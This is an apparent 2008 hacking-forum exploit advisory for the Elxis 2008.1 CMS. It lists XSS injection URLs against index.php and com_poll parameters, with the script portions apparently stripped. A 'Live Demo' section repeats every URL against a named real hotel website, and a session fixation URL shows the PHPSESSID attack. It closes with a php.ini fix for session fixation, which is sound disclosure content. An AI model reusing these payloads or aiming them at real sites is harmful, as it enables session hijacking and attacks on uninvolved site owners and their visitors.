################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ \ _ \ __| _/____ # # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # # \/ \/ \/ # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ \ \/ \/ / # # \ \___| | \/\ ___/\ / # # \___ >__| \___ >\/\_/ # # est.2007 \/ \/ forum.darkc0de.com # ################################################################ ################################################################ # Greetings to --d3hydr8 -r45c4l -baltazar -sinner_01 # # -C1c4Tr1Z -Gabitzu and all darkc0de members # ;############################################################### # # Author: swappie [aka] faithlove # # Home : www.darkc0de.com # # Email : swappieakafaithlove@gmail.com # # Do researching and share! # ;############################################################### # # Title: Elxis 2008.1 Nemesis # # Issue Date: Monday, 29 September 2008 # # CMS Link: http://www.elxis-downloads.com/fserver/96.html # Vendor: http://www.elxis.org/ # # ;############################################################### # # Dork: I'm sure you can figure that by yourself, right? # ################################################################# ---------- XSS Vulns; ---------- http://www.site.com/?>'"> http://www.site.com/index.php/>"> http://www.site.com/index.php?option=>"> http://www.site.com/index.php?option=com_poll&Itemid=>"> http://www.site.com/index.php?option=com_poll&task=view&id=>"> http://www.site.com/index.php?option=com_poll&Itemid=1&task=>"> http://www.site.com/index.php?option=com_poll&task=view&bid=>"> http://www.site.com/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"> ---------- Live Demo; ---------- http://www.hotelsinalbania.net/?>'"> http://www.hotelsinalbania.net/index.php/>"> http://www.hotelsinalbania.net/index.php?option=>"> http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=>"> http://www.hotelsinalbania.net/index.php?option=com_poll&task=view&id=>"> http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=1&task=>"> http://www.hotelsinalbania.net/index.php?option=com_poll&task=view&bid=>"> http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"> ;==================================================================; ;==================================================================; ----------------- Session Fixation; ----------------- http://www.site.com/?PHPSESSID=[session_fixation] Explanation: The user's session ID could be fixed by the attacker before the user even logs on the target server so it wouldn't be needed to get the session ID afterwards. How to fix the "session fixation" ? There is a simple way to do it. Step 1. Open the file named php.ini from your server. Step 2. Look through the file for the following lines: ; This option enables administrators to make their users invulnerable to ; attacks which involve passing session ids in URLs; defaults to 0. ; session.use_only_cookies = 1 !![PLEASE NOTE THE ";"]!! Step 3. => [ and make it look like this: ] ; This option enables administrators to make their users invulnerable to ; attacks which involve passing session ids in URLs; defaults to 0. session.use_only_cookies = 1 Step 4. Restart the web server, php, whatever. Cheers, swappie [aka] faithlove